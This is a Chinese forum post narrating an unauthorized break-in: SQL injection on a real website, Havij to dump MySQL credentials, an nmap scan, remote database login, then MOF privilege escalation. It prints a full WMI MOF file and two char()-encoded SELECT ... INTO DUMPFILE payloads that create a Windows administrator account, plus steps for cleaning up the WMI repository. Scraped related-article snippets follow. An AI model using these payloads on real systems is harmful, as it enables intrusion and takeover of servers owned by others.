扫到一个站的注入
<ignore_js_op> 
在havij中得到mysql数据库中mysql库保存的数据库密码:
<ignore_js_op> 
有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。
照样放到坛子里让机油破了
<ignore_js_op> 
感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。
在等着密码破解出来的时候顺便nmap了一下
<ignore_js_op> 
意外发现端口改到了1126,给后面省下了不少时间。
照常外连试试
<ignore_js_op> 
上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的
现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。
但是网站上面暴不出路径,看看mysql的路径
用select @@basedir;命令可以看到;
<ignore_js_op> 
网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。
Mof的科普文很多,大家有兴趣看看网盘链接这两个,很详细的,大家共同学习;

http://pan.baidu.com/share/link?shareid=438074&uk=101689864

http://pan.baidu.com/share/link?shareid=438077&uk=101689864mof文件内容为:

  1. #pragma namespace("\\\\.\\root\\subscription")
  2. instance of __EventFilter as $EventFilter
  3. {
  4. EventNamespace = "Root\\Cimv2";
  5. Name  = "filtP2";
  6. Query = "Select * From __InstanceModificationEvent "
  7. "Where TargetInstance Isa \"Win32_LocalTime\" "
  8. "And TargetInstance.Second = 5";
  9. QueryLanguage = "WQL";
  10. };
  11. instance of ActiveScriptEventConsumer as $Consumer
  12. {
  13. Name = "consPCSV2";
  14. ScriptingEngine = "JScript";
  15. ScriptText =
  16. "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
  17. };
  18. instance of __FilterToConsumerBinding
  19. {
  20. Consumer   = $Consumer;
  21. Filter = $EventFilter;
  22. };

复制代码

于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多“;回车”之类的符号。
然后就想转化为16进制或者asc码这样。
先试了16进制。
等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

  1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

效果就是添加一个用户admin密码admin;
等了有5秒,登陆框的提示从
<ignore_js_op> 
变成了
<ignore_js_op> [size=0.83em]17 小时前 上传
下载附件 [size=0.83em](51.04 KB)

这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。
好吧,重新写一遍mof

  1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

好了,这样就顺利登进去了;
<ignore_js_op>

改天研究一下一次性完成添加管理员试试

现在默认它还是会过5s添加一次用户,解决方法就是:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
还有其他方法在网盘的文件里面有写。

一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。

无shell情况下的mysql远程mof提权利用方法详解的更多相关文章

  1. MySQL服务器线程数的查看方法详解

    本文实例讲述了MySQL服务器线程数的查看方法.分享给大家供大家参考,具体如下: mysql重启命令: ? 1 /etc/init.d/mysql restart MySQL服务器的线程数需要在一个合 ...

  2. 如何在删除ibdata1和ib_logfile的情况下恢复MySQL数据库

    昨天,有个朋友对公司内部使用的一个MySQL实例开启binlog,但是在启动的过程中失败了(他也没提,为何会失败),在启动失败后,他删除了ibdata1和ib_logfile,后来,能正常启动了,但所 ...

  3. KVM虚拟机内无agent情况下的监控方法

    KVM虚拟机内无agent情况下的监控(ceilometer实现) 今天看到大家在群里讨论KVM虚拟机的监控问题,而且是要求VM内无agent情况下的监控.这方面确实没有深入研究,但尚有些openst ...

  4. 关于img标签浏览器自带的边框,清除边框的解决方式(即img[src=""] img无路径情况下,灰色边框去除解决方法)

    详解img[src=""] img无路径情况下,灰色边框去除解决方法 1.Js解决办法 <html> <head> <meta charset=&qu ...

  5. mysql 远程连接数据库的二种方法

    http://blog.csdn.net/freecodetor/article/details/5799550 一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5 ...

  6. mysql 远程连接数据库的二种方法

    一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5.116),端口"3306",用户名为"root",密码"123 ...

  7. 转 mysql 远程连接数据库的二种方法

    mysql 远程连接数据库的二种方法   一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5.116),端口“3306”,用户名为“root”,密码“123456” ...

  8. Centos下忘记mysql的root密码的解决方法

    Centos下忘记mysql的root密码的解决方法 一:(停掉正在运行的mysql) [root@NetDakVPS ~]# service mysql stop 二:使用 “--skip-gran ...

  9. 【转】CentOS6下安装mysql后,重置root密码方法

    本文转自:CentOS6下安装mysql后,重置root密码方法 centos下安装mysql,居然不知道root用户密码,本想重装,不过还是先度娘了一些,发现这篇文章,刚好解决我的燃眉之急,太赞了. ...

随机推荐

  1. JavaScript:变量对象(Variable Object)

    引言:在使用JavaScript编程的时候,避免不了声明函数和变量,但是我们很少知道解释器是如何并且在什么地方找到这些函数和变量的,我们在引用这些对象的时候究竟发生了什么? 对ECMAScript程序 ...

  2. $.noop()和$.map()函数

    最近在项目中发现$.noop()函数,因以前没使用过故查询下,现整理如下: jQuery.noop()函数是一个空函数,它什么也不做. 当某些时候你需要传入函数参数,而且希望它什么也不做的时候,你可以 ...

  3. 搭建linux系统环境

    1.安装centos6.4 x86,选择的是Desktop模式2.配置centos a关闭NetwrokManager(chkconfig NetworkManager off) b开机启动netwo ...

  4. php大力力 [001节]2015-08-21.php在百度文库的几个基础教程新手上路日记 大力力php 大力同学 2015-08-21 15:28

    php大力力 [001节]2015-08-21.php在百度文库的几个基础教程新手上路日记 大力力php 大力同学 2015-08-21 15:28 话说,嗯嗯,就是我自己说,做事认真要用表格,学习技 ...

  5. 评价软件_搜狗输入法(pc端)

    一.用户界面 用户在初次下载后,会有一个非常简洁的界面,如图:

  6. 第一个PHP程序

    <html> <head> <title><?php echo"这是第一个php程序"?></title> <st ...

  7. 使用httputils上传图片到服务器

    //创建httpUtils对象 HttpUtils mRegHttpUtils = new HttpUtils(); //图片路径 String path = "/sdcard/Downlo ...

  8. Unity3D ShaderLab 使用贴图对模型的高光进行遮罩

    Unity3D ShaderLab 使用贴图对模型的高光进行遮罩 前面研究了高光效果的实现,再说说现很多游戏用到的高光贴图技术,因为它可以让3D美工更容易控制最终的视觉效果. 这也就为我们提供了另外的 ...

  9. Magento架构师的笔记-----Magento显示当前目录的父分类和子分类的分类名

    在Magento目录的分类页面里,希望在左侧导航获取到父分类和子分类,可以用以下方法:打开app/your_package/your_themes/template/catalog/navigatio ...

  10. python报错

    报错1 UnboundLocalError: local variable 'x' referenced before assignment 定义了一个全局参数,但是在函数中直接改变参数值,就会报这个 ...